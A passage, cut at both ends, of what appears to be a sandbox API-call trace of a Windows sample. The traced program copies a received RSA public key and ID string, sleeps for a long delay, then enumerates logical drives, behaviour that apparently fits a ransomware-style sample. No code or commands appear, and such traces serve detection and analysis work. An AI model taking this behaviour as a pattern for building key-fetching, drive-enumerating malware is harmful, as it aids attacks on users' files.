KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0160.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x442) returned 0x35e1768 [0160.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1023a778, cbMultiByte=-1, lpWideCharStr=0x35e1768, cchWideChar=545 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 545 [0160.369] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" [0160.369] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0160.369] lstrlenA (lpString="\",\"id\":\"") returned 8 [0160.369] lstrcpyA (in: lpString1=0x1023ab78, lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" | out: lpString1="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" [0160.369] lstrcpyA (in: lpString1=0x1023a778, lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" | out: lpString1="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.369] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.370] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.370] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.370] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.370] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.370] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.370] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.370] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.370] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.370] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.370] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.370] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.370] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.370] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3579360 [0160.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x854) returned 0x3a04aa8 [0160.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3579360, cbMultiByte=-1, lpWideCharStr=0x3a04aa8, cchWideChar=1066 | out: lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 43 [0160.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3a05308 [0160.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a04aa8 | out: hHeap=0x2c0000) returned 1 [0160.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3579360 | out: hHeap=0x2c0000) returned 1 [0160.370] lstrcpyW (in: lpString1=0x521cf0, lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" | out: lpString1="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" [0160.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a05308 | out: hHeap=0x2c0000) returned 1 [0160.370] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0160.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x56) returned 0x3507778 [0160.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1023a778, cbMultiByte=-1, lpWideCharStr=0x3507778, cchWideChar=43 | out: lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 43 [0160.370] lstrcpyW (in: lpString1=0x521cf0, lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" | out: lpString1="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" [0160.370] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0160.370] lstrlenW (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 40 [0160.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35e0f98 | out: hHeap=0x2c0000) returned 1 Thread: id = 104 os_tid = 0xab0 [0160.790] timeGetTime () returned 0x1157f7c [0160.790] GetLastError () returned 0x54f [0160.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3bc) returned 0x35e0f98 [0160.790] GetCurrentThreadId () returned 0xab0 [0160.790] SetLastError (dwErrCode=0x54f) [0160.790] Sleep (dwMilliseconds=0x19a28) [0172.539] Sleep (dwMilliseconds=0x3e8) [0173.554] GetLogicalDrives () returned 0x4 [0173.554] SetErrorMode (uMode=0x1) returned 0x0 [0173.554] PathFileExistsA (pszPath="C:\\") returned 1 [0173.555] SetErrorMode (uMode=0x0) returned 0x1 [0173.555] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0173.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x806) returned 0x3aa2818 [0173.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa13fe60, cbMultiByte=-1, lpWideCharStr=0x3aa2818, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0173.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a8ca68 [0173.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x31b980 [0173.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.555] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, 